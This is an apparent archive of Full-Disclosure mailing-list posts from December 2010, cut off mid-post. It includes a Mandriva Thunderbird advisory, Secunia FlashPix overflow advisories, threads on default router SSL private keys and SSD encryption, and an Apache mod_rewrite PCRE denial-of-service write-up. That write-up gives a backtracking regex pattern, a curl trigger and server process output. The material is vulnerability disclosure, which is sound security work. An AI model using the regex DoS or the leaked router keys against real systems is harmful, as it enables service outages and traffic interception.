-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:258 http://www.mandriva.com/security/ ___ Package : mozilla-thunderbird Date: December 20, 2010 Affected: 2009.0, 2010.0, 2010.1 ___ Problem Description: Security issues were identified and fixed in mozilla-thunderbird: Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 do not properly validate downloadable fonts before use within an operating system's font implementation, which allows remote attackers to execute arbitrary code via vectors related to @font-face Cascading Style Sheets (CSS) rules (CVE-2010-3768). The line-breaking implementation in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 on Windows does not properly handle long strings, which allows remote attackers to execute arbitrary code via a crafted document.write call that triggers a buffer over-read (CVE-2010-3769). Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors (CVE-2010-3776). Unspecified vulnerability in Mozilla Firefox 3.6.x before 3.6.13 and Thunderbird 3.1.x before 3.1.7 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors (CVE-2010-3777). Unspecified vulnerability in Mozilla Firefox 3.5.x before 3.5.16, Thunderbird before 3.0.11, and SeaMonkey before 2.0.11 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors (CVE-2010-3778). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 Additionally, some packages which require so, have been rebuilt and are being provided as updates. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3768 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3769 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3778 http://www.mozillamessaging.com/en-US/thunderbird/3.0.11/releasenotes/ ___ Updated Packages: Mandriva Linux 2009.0: fccf9646188072751f5a7ccd5ea99093 2009.0/i586/beagle-0.3.8-13.32mdv2009.0.i586.rpm 2ab2f2d5f07340d31d46b7da22d6824a 2009.0/i586/beagle-crawl-system-0.3.8-13.32mdv2009.0.i586.rpm 452bd02a8bd7b9f0b2f8f13d18a79d2f 2009.0/i586/beagle-doc-0.3.8-13.32mdv2009.0.i586.rpm 9b263f22ed4040de8ef18856fa0f0151 2009.0/i586/beagle-epiphany-0.3.8-13.32mdv2009.0.i586.rpm 28be09dd956921130ac65818af4e0a0f 2009.0/i586/beagle-evolution-0.3.8-13.32mdv2009.0.i586.rpm e95d2331b9e62152541519cdd621d8b3 2009.0/i586/beagle-gui-0.3.8-13.32mdv2009.0.i586.rpm 5ae981d91836b97b032f15c211c8e6c6 2009.0/i586/beagle-gui-qt-0.3.8-13.32mdv2009.0.i586.rpm ae3d0e076da43c7c3b223de2b6dbe22a 2009.0/i586/beagle-libs-0.3.8-13.32mdv2009.0.i586.rpm 6e2ea10ff7e5235d68da215da7500ed9 2009.0/i586/firefox-ext-beagle-0.3.8-13.32mdv2009.0.i586.rpm 61abe671a3bd7f78423848a2626e9ada 2009.0/i586/mozilla-thunderbird-3.0.11-0.1mdv2009.0.i586.rpm d90d86f0cefe498d1b09a21d735f889d 2009.0/i586/mozilla-thunderbird-af-3.0.11-0.1mdv2009.0.i586.rpm bce9b6f6fea37fa61eff2123bac0464d 2009.0/i586/mozilla-thunderbird-ar-3.0.11-0.1mdv2009.0.i586.rpm 7b79aaffdeecdc6edd23b80a401ac42b 2009.0/i586/mozilla-thunderbird-be-3.0.11-0.1mdv2009.0.i586.rpm 5fb5a6b7863f8aec936a50ee786d4b09 2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.32mdv2009.0.i586.rpm a5ac95da0aab8dd3d6ea867ebc2b4fdb 2009.0/i586/mozilla-thunderbird-bg-3.0.11-0.1mdv2009.0.i586.rpm cfdd03115c4024a0853f75cc52a30ce0 2009.0/i586/mozilla-thunderbird-ca-3.0.11-0.1mdv2009.0.i586.rpm 3cdc6f771f3ae26d0934aa8285bc27bb 2009.0/i586/mozilla-thunderbird-cs-3.0.11-0.1mdv2009.0.i586.rpm 197b432492db1c2898801722b229d5f6 2009.0/i586/mozilla-thunderbird-da-3.0.11-0.1mdv2009.0.i586.rpm 90535588713215b8a9bc1b0adfcef6b4 2009.0/i586/mozilla-thunderbird-de-3.0.11-0.1mdv2009.0.i586.rpm 7351b093d8adf1ecba3d721dd7e1ab03
Re: [Full-disclosure] OpenBSD Paradox
On Wed, Dec 15, 2010 at 12:22 PM, Theo de Raadt dera...@cvs.openbsd.org wrote: ... IPSEC isn't 100% crypto; IPsec hasn't been IPSEC since rfc4301 or so... /pedant ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
On Sat, Dec 18, 2010 at 7:13 PM, Craig Heffner cheff...@devttys0.com wrote: The LittleBlackBox project contains a database of over 2,000 (and growing) private SSL keys that are correlated with their respective public certificates, and hardware/firmware versions. While most of these certificates are from DD-WRT firmware, there are also private keys from other vendors including Cisco, Linksys, D-Link and Netgear. Most of what I have read so far indicates that these secret keys can be used to sniff only administrative traffic to the device itself. I have a client who uses a bunch of WRV200's for corp VPN access. They are configured with a shared secret. Wouldn't they use DH with the built in private key to exchange the shared secret which would make the VPN traffic itself vulnerable? Looks like you have the 210 but not the 200 but I bet your tool could pull out the key for wrv200. BMF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Paradox
On 12/20/2010 05:02 PM, coderman wrote: On Wed, Dec 15, 2010 at 12:22 PM, Theo de Raadtdera...@cvs.openbsd.org wrote: ... IPSEC isn't 100% crypto; IPsec hasn't been IPSEC since rfc4301 or so... /pedant Well that's the proof of the backdoor then! Everyone knows TOP SECRET GOVERNMENT COMPUTERS USE ONLY UPPERCASE LETTERS. They also make that cool bp-bp sound as they print out embassy cables at 300 bps. But actually, RFC 4301 (ahem, please watch your capitalization) says: The spelling IPsec is preferred and used throughout this and all related IPsec standards. All other capitalizations of IPsec (e.g., IPSEC, IPSec, ipsec) are deprecated. However, any capitalization of the sequence of letters IPsec should be understood to refer to the IPsec protocols. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSD and WDE
On Fri, Dec 17, 2010 at 3:16 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: ... anyone aware of any academic or technical studies of whole disk encryption for solid state discs. what kind of details are you looking for? solid state and full disk encryption are a match made in heaven. the rest is just details... *grin* SLC over MLC and pair with on die accelerated AES. as with disk based, encryption renders all reads and writes effectively randomized. SSD removes seek hit but you have still invalidated read-ahead caching and other common optimizations. update firmware as nearly all devices have undergone wear-leveling, hw driver, and other fixes post launch. regarding wear leveling, FDE means never having to worry about secure delete, which may not be possible with reasonable effort on MLC SSD storage. SSD make fine compliment to hybrid storage; small fast SLC first tier backed by platters for extended duration and volume. key management of hybrid / multi LVM encrypted systems too long a tale to discuss here. but also not unique to SSD. hardware-based FDE is also just as applicable to SSD as other media. invoking CDE on demand a useful convenience. but also not unique to SSD. aside from MLC algorithm specific difficulties of data remanence all the usual disclaimers on zerisation and key management apply, including secure mode of operation. this also not unique to SSD. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD Paradox
On Mon, Dec 20, 2010 at 4:20 PM, Marsh Ray ma...@extendedsubset.com wrote: ... RFC 4301 (ahem, please watch your capitalization) says: The spelling IPsec is preferred and used throughout this and all related IPsec standards. All other capitalizations of IPsec (e.g., IPSEC, IPSec, ipsec) are deprecated. However, any capitalization of the sequence of letters IPsec should be understood to refer to the IPsec protocols. iPsEc makes me sad in stack. REGARDING PROOF; I CONCUR. OCCAM OVER. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
On Mon, Dec 20, 2010 at 4:04 PM, BMF badmotherfs...@gmail.com wrote: ... Most of what I have read so far indicates that these secret keys can be used to sniff only administrative traffic to the device itself. right. considering 97.3% of these devices have trivial XSRF, remote access, and other vectors wide open this (active MitM to HTTPS admin panel on home localnet?) is the least of your concerns. I have a client who uses a bunch of WRV200's for corp VPN access. They are configured with a shared secret. Wouldn't they use DH with the built in private key to exchange the shared secret which would make the VPN traffic itself vulnerable? this is ambiguous. what kind of VPN? are you keying ISAKMP daemon with a shared secret or is manual pre-shared key what you're describing? very different levels of privacy and forward secrecy respectively. see IPSecVPN chapter, specifically Auto (IKE) key exchange method, AES ISAKMP Encryption Method, SHA ISAKMP Authentication Method, 2048 or 4096 ISAKMP DH Group, PFS Enabled, AES IPSec Encryption Method, SHA IPSec Authentication Method, Pre-shared Key for ISAKMP authentication in manual. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Default SSL Keys in Multiple Routers
On Mon, Dec 20, 2010 at 7:04 PM, BMF badmotherfs...@gmail.com wrote:
On Sat, Dec 18, 2010 at 7:13 PM, Craig Heffner cheff...@devttys0.com wrote:
The LittleBlackBox project contains a database of over 2,000 (and growing)
private SSL keys that are correlated with their respective public
certificates, and hardware/firmware versions. While most of these
certificates are from DD-WRT firmware, there are also private keys from
other vendors including Cisco, Linksys, D-Link and Netgear.
Most of what I have read so far indicates that these secret keys can
be used to sniff only administrative traffic to the device itself.
I have a client who uses a bunch of WRV200's for corp VPN access. They
are configured with a shared secret. Wouldn't they use DH with the
built in private key to exchange the shared secret which would make
the VPN traffic itself vulnerable?
When using DH for the exchange of the random values, the random value
is raised to the group base, ie, g^a (or g^b) where 'a' is one side's
random {16|32|x} bytes. The private key would be used to sign the
messages used in the exchange of the material. This scheme is referred
to as Ephemeral Diffie Hellman or DH2.
An intermediate with knowledge of a private key could play the role of
man in the middle since he/she could forge a signature. So the
security properties of the signature over the exchange would be
destroyed, and the system would be no more secure than standard DH.
And standard DH is vulnerable to MITM.
If the attacker is passive and cannot intercept the messages or assume
the role of MITM, then the confidentiality of messages are probably
safe. The bad guy would probably not be able to inject messages since,
for bulk encryption (ie, after key exchange), the protocol would
switch to a HMAC rather than digital signatures. But I would not feel
good knowing a private key used for signing was in the hands of a
[malicious?] third party.
Jeff
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Microsoft Office FlashPix Property Set Parsing Buffer Overflow
== Secunia Research 14/12/2010 - Microsoft Office FlashPix Property Set Parsing Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office Converter Pack NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System access Where: From remote == 3) Vendor's Description of Software Microsoft Office is a complete suite of productivity and database software that will help you save time and stay organized. Product Link: http://office.microsoft.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Office, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error in the FlashPix graphics filter when parsing certain property sets. This can be exploited to cause a stack-based buffer overflow via a specially crafted FlashPix image. Successful exploitation allows execution of arbitrary code. == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 27/07/2009 - Vendor notified. 27/07/2009 - Vendor response. 19/08/2009 - Vendor provides status update. 24/09/2009 - Vendor provides status update. 27/10/2009 - Vendor provides status update. 08/12/2009 - Vendor provides status update. 29/01/2010 - Vendor provides status update. 30/04/2010 - Vendor provides status update (tentatively targetting August 2010). 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now scheduled for November 2010). 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that December is the final deadline. 14/12/2010 - Public disclosure. == 7) Credits Discovered by Dyon Balding, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3951 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-33/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted
[Full-disclosure] Secunia Research: Microsoft Office FlashPix Tile Data Two Buffer Overflows
== Secunia Research 14/12/2010 - Microsoft Office Two FlashPix Tile Data Buffer Overflows - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Office XP SP3 * Microsoft Office Converter Pack NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System access Where: From remote == 3) Vendor's Description of Software To convert documents to and from different formats or to insert graphics, you must install the appropriate text converters or graphics filters included with the Microsoft Office 2000 Setup or the Microsoft Office Converter Pack.. Product Link: http://office.microsoft.org/ == 4) Description of Vulnerability Secunia Research has discovered two vulnerabilities in Microsoft Office, which can be exploited by malicious people to compromise a user's system. 1) A boundary error in the FlashPix graphics filter when parsing certain tile data can be exploited to cause a data section buffer overflow via a specially crafted image. 2) A boundary error in the FlashPix graphics filter when parsing certain tile data can be exploited to cause a stack-based buffer overflow via a specially crafted image. Successful exploitation of the vulnerabilities allows execution of arbitrary code. == 5) Solution Apply patches provided by MS10-105. == 6) Time Table 27/07/2009 - Vendor notified. 27/07/2009 - Vendor response. 19/08/2009 - Vendor provides status update. 24/09/2009 - Vendor provides status update. 27/10/2009 - Vendor provides status update. 08/12/2009 - Vendor provides status update. 29/01/2010 - Vendor provides status update. 30/04/2010 - Vendor provides status update (tentatively targetting August 2010). 23/07/2010 - Vendor provides status update (slipped from August 2010 release and now scheduled for November 2010). 04/11/2010 - Vendor provides status update (slipped from November 2010 release and now scheduled for December 2010). 08/11/2010 - Vendor informed that this is the final deadline. 14/12/2010 - Public disclosure. == 7) Credits Discovered by Dyon Balding, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3952 for the vulnerabilities. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-32/ Complete list of vulnerability reports published by Secunia Research:
[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Apache Insecure mod_rewrite PCRE Resource Exhaustion ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 19.09.2010 - - Pub.: 21.12.2010 Affected (tested): - - NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4) - - Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3) Original URL: http://securityreason.com/achievement_securityalert/92 - --- 0.Description --- The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million web site milestone The PCRE(Perl Compatible Regular Expressions) library is a set of functions that implement regular expression pattern matching using the same syntax and semantics as Perl 5. PCRE has its own native API, as well as a set of wrapper functions that correspond to the POSIX regular expression API. The PCRE library is free, even for building proprietary software. - --- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion --- Using mod_rewrite and PCRE libs can be dangerous for stability apache server. Everybody know that using pcre regular expressions generate possible risk of DoS attack , and using multiple regular expressions in .htaccess is not good idea. I will show possibility DoS attack using .htaccess. Off course we can try configure our machine to be safe, anyway many servers are affected for this. Many versions of regular expressions, has no control over what executes. Example tags: let's see what will happen in firefox for this expression: .*.*.*(\w+)$1 Nothing special. Try this: .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1 result in Firefox javascirpt: Warning: Unresponsive script Long execution in pcre generate Unresponsive script. That same algorithm we can use in .htaccess $ httpd -v php -v Server version: Apache/2.2.17 (Unix) Server built: Nov 11 2010 19:51:37 PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies $ pwd ls -la /home/cx/public_html total 4 drwxrwxrwx 2 cx cx 512 Dec 19 01:10 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. $ vi poc.php $ ls -la . total 8 drwxrwxrwx 2 cx cx 512 Dec 19 01:16 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. - -rw-r--r-- 1 cx cx 2665 Dec 19 01:18 poc.php and remote request to poc.php c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php on the server, any apache childs will stop in .htaccess (mod_rewrite = PCRE) # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 503 13.8 2.4 35620 27420 ? R 1:19AM 0:04.94 /usr/pkg/sbin/httpd -k start www 414 9.6 2.3 33572 25400 ? R 1:20AM 0:03.24 /usr/pkg/sbin/httpd -k start www 474 7.9 2.2 32548 24544 ? R 1:19AM 0:02.17 /usr/pkg/sbin/httpd -k start www 345 6.5 2.1 31524 23888 ? R 1:19AM 0:01.79 /usr/pkg/sbin/httpd -k start www 482 7.0 1.9 29476 21536 ? R 1:22AM 0:00.94 /usr/pkg/sbin/httpd -k start www 495 4.6 2.0 30500 22944 ? R 1:19AM 0:01.24 /usr/pkg/sbin/httpd -k start www 844 3.2 0.5 11980 5280 ? S 1:22AM 0:00.94 /usr/pkg/libexec/cgi-bin/php www 289 2.2 1.0 19236 10888 ? R 1:22AM 0:00.23 /usr/pkg/sbin/httpd -k start www 859 3.2 1.5 25380 17220 ? R 1:22AM 0:00.44 /usr/pkg/sbin/httpd -k start www 337 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 543 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 554 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068 3940 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 955 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 979 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 389 4.0 1.9 29476 21360 ? R 1:22AM 0:00.80 /usr/pkg/sbin/httpd -k start www 455 4.3 1.8 28452 20080 ? R 1:22AM 0:00.55 /usr/pkg/sbin/httpd -k start www 712 4.9 1.8 27428 19688 ? R 1:22AM 0:00.51 /usr/pkg/sbin/httpd -k start www 516 3.8 2.1 31524 23632 ? R 1:22AM 0:02.05 /usr/pkg/sbin/httpd -k start ... www 1011 2.3 2.0 30500 21980 ? R 1:22AM 0:01.16 /usr/pkg/sbin/httpd -k start www 398 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 400 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? I 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 653 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068 3940 ? I 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k
